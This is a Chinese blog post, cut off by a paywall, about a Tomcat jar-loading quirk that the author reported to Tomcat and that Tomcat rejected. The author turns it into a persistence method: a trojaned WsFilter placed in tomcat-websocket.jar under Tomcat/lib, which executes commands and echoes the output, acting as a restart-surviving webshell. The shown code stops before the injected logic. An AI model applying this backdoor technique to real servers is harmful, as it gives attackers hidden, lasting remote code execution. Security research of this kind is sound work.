从一个被Tomcat拒绝的漏洞到特殊内存马

最新推荐文章于 2024-03-21 14:30:00 发布
最新推荐文章于 2024-03-21 14:30:00 发布
阅读量884 收藏 3
点赞数 4
分类专栏: 黑客 漏洞 安全 文章标签: web安全 深度学习 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HBohan/article/details/121560218
版权
本文介绍了通过Tomcat的解析漏洞,如何构造并利用一个特殊的内存马。作者发现了在Tomcat/lib目录下,通过添加命名有空格或特殊字符的jar包,可以实现恶意WsFilter的加载,从而在服务重启后形成持久化的Webshell。尽管Tomcat官方认为这需要其他漏洞配合触发,但作者展示了在特定情况下,这种利用方式可能绕过常规审计。
摘要由CSDN通过智能技术生成

介绍

今天研究内存马相关的东西,偶然间发现一处解析BUG

一句话来说就是:Tomcat启动时会加载lib下的依赖jar,如果黑客通过上传漏洞或者反序列化漏洞在这个目录添加一个jar,重启后,某些情况下这个jar会被当成正常库来加载,在一定条件下造成RCE

不一定算得上是漏洞,不过我还是向Tomcat发了邮件尝试
在这里插入图片描述
Tomcat果然拒绝了,原因是需要在其他漏洞的基础上触发
在这里插入图片描述
这个漏洞其实在一些情况下会有巧妙的利用,本文就围绕这个利用点来谈

→点击查看技术资料←

1.2000多本网络安全系列电子书
2.网络安全标准题库资料
3.项目源码
4.网络安全基础入门、Linux、web安全、攻防方面的视频
5.网络安全学习路线图

思路

思路来自于之前写的一篇文章:某知名Java框架内存马挖掘

从中得到一种思路:将恶意代码逻辑隐藏到目标框架必须的Filter中

换句话来说,是否能将恶意代码注入到Tomcat默认存在的Filter中呢

使用c0ny1师傅的检测工具发现,任何情况都会存在WsFilter
在这里插入图片描述
能否构造出一个恶意的WsFilter类注入到依赖库中

构造

在目标Tomcat/lib下找到tomcat-websocket.jar
在这里插入图片描述
找到WsFilter的代码,在doFilter中插入一些代码

我这里是简单的回显执行命令,也可以是一些其他逻辑

package org.apache.tomcat.websocket.server;

import java.io.IOException;

import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

/**
 * Handles the initial HTTP connection for WebSocket connections.
 */
public class WsFilter implements Filter {
   

    private WsServerContainer sc;


    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
   
        sc = (WsServerContainer) filterConfig.getServletContext().getAttribute(
                Constants.SERVER_CONTAINER_SERVLET_CONTEXT_ATTRIBUTE);
    }


    @Override
    public void
最低0.47元/天 解锁文章
IT老涵
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
最新版windows apache-tomcat-8.5.72-windows-x64.zip
10-12
最新版windows apache-tomcat-8.5.72-windows-x64.zip最新版windows apache-tomcat-8.5.72-windows-x64.zip
Tomcat 又爆出高危漏洞!!Tomcat 8.5 ~ 10 中招…
sinat_32849897的博客
07-02 1342
开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏洞。不要使用含有漏洞的组件每次也都被评...
Tomcat】Apache Tomcat多个大版本存在拒绝服务漏洞
cnskylee的博客
12-13 4299
根据Apache Tomcat官方安全报告,Apache Tomcat的多个版本存在因为内存泄漏而导致的拒绝服务的漏洞(CVE编号:CVE-2021-42340)。 受影响的各个大版本: 8.5.xx版本:8.5.60 到8.5.71(8.5.72 版本修复) 9.0.xx版本:9.0.40 到9.0.53(9.0.54 版本修复) 10.0.xx版本:10.0.0-M10 到10.0.11(10.0.12版本修复) 建议升级到以下对应的最新版本: 8.5.73 、9.0.56...
Apache Tomcat请求走私漏洞 CVE-2022-42252
INSBUG的博客
09-01 2379
Apache Tomcat一个开源的Java Servlet容器和JavaServer Pages(JSP)容器。它是由Apache软件基金会开发和维护的,是一个轻量级、快速、可扩展的Web服务器,用于执行Java Servlet和JavaServer Pages技术。
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
weixin_43102772的博客
03-09 5356
CVE-2020-1938 Apache Tomcat 文件包含漏洞复现
tomcat服务器8.0版本 apache-tomcat-8.0.15.zip
03-30
这个版本,8.0.15,是一个稳定版,提供了许多增强的功能和修复了已知的安全漏洞。在本文中,我们将深入探讨Tomcat 8.0的关键特性、安装与配置过程以及如何部署Web应用程序。 首先,Tomcat 8.0引入了Java EE 7的兼容...
JAVA上百实例源码以及开源项目
01-03
在有状态SessionBean中,用累加器,以对话状态存储起来,创建EJB对象,并将当前的计数器初始化,调用每一个EJB对象的count()方法,保证Bean正常被激活和钝化,EJB对象是用完毕,从内存中清除…… Java Socket 聊天...
JAVA上百实例源码以及开源项目源代码
12-11
在有状态SessionBean中,用累加器,以对话状态存储起来,创建EJB对象,并将当前的计数器初始化,调用每一个EJB对象的count()方法,保证Bean正常被激活和钝化,EJB对象是用完毕,从内存中清除…… Java Socket 聊天...
java开源包1
06-28
BlueLeech是一个开源程序,它从指定的URL开始,搜索所有可用的链接,以及链接之上的链接。它在搜索的同时可以下载遇到的链接所指向的所有的或预定义的范围的内容。 WebSocket协议的Java实现 WebSocket4J WebSocket4...
java开源包11
06-28
BlueLeech是一个开源程序,它从指定的URL开始,搜索所有可用的链接,以及链接之上的链接。它在搜索的同时可以下载遇到的链接所指向的所有的或预定义的范围的内容。 WebSocket协议的Java实现 WebSocket4J WebSocket4...
TomcatTomcat多个版本存在信息泄漏漏洞
cnskylee的博客
05-20 3591
官方原文对于该漏洞的描述(看着这描述,比较费力,这里就不做翻译了)When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1
Apache Tomcat 信息泄露漏洞CVE-2023-28708处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-10 6620
那么Tomcat就会删除之前的War包解压的文件夹,重新解压新的War包。导致信息泄露,相关分析这是由于在请求https的时候可重定向到http连接,这个过程会导致会话劫持风险,造成Cookie或Session不安全传输,攻击者可利用该漏洞可在未授权的情况下泄漏 Cookie 或 Session,最终造成服务器敏感性信息泄露。改变,包括web-inf/class,wen-inf/lib,web-inf/web.xml等文件,若发生更改,则局部进行加载,不清空session ,不释放内存
Apache Tomcat 8.5安装配置教程
热门推荐
fwdwqdwq的博客
08-01 1万+
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。因此我收集了一份《java开发全套学习资料》送给大家,初衷也很简单,就是希望帮助到想自学又不知道该从何学起的朋友,同时减轻大家的负担。这时候不要关闭控制台界面,打开浏览器,输入http//localhost8080,出现Tomcat的网页,证明安装并配置成功!右击“我的电脑”>>选择“属性”>>单击左侧栏“高级系统设置”>>“高级”>>“环境变量”变量值直接复制,添加在原变量值的末尾。...
Error running ‘Tomcat 8.5.72‘: Cannot run program “.../tomcat...“...error=13, Permission denied
yi234567bo的博客
04-04 1151
IDEA运行tomcat报错如下: Error running ‘Tomcat 8.5.72’: Cannot run program “/Users/yibo/java_software/apache-tomcat-8.5.72/bin/catalina.sh” (in directory “/Users/yibo/java_software/apache-tomcat-8.5.72/bin”): error=13, Permission denied Error running 'Tomcat 8.5.
中间件安全Tomcat常见漏洞
最新发布
ZL_1618的博客
03-21 2705
链接。
tomcat 漏洞集合
qq_53229503的博客
09-02 7376
tomcat 漏洞集合
Tomcat8.5.34.0版本漏洞修复
modaner的博客
08-26 1187
5.替换tomcat相关文件 server.xml web.xml catalina.sh logs。2.停止tomcat服务,备份源tomcat文件夹只tomcat_bak目录。6.重命名apache-tomcat-8.5.79文件夹为tomcat漏洞1:拒绝式服务漏洞 组件远程代码执行漏洞 反序列话代码执行漏洞Tomcat8.5.34.0版本漏洞修复。漏洞2:AJP协议文件读取与包含严重漏洞。4.拷贝文件至/usr/local目录下。7.注释掉配置文件中的AJP协议。3.解压tomcat。...
学习Tomcat(六)之类加载器
小明的博客
10-06 541
通过前面的文章我们知道,Tomcat的请求最终都会交给用户配置的servlet实例来处理。Servlet类是配置在配置文件中的,这就需要类加载器对Servlet类进行加载。Tomcat容器自定义了类加载器,有以下特殊功能:1. 在载入类中指定某些规则;2.缓存已经载入的类;3.实现类的预加载。 本文会对Tomcat的类加载器进行详细介绍。 Java类加载双亲委派模型 Java类加载器是用户程序和JVM虚拟机之间的桥梁,在Java程序中起了至关重要的作用,关于其详细实现可以参考了java官方文档关于虚拟机加载
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值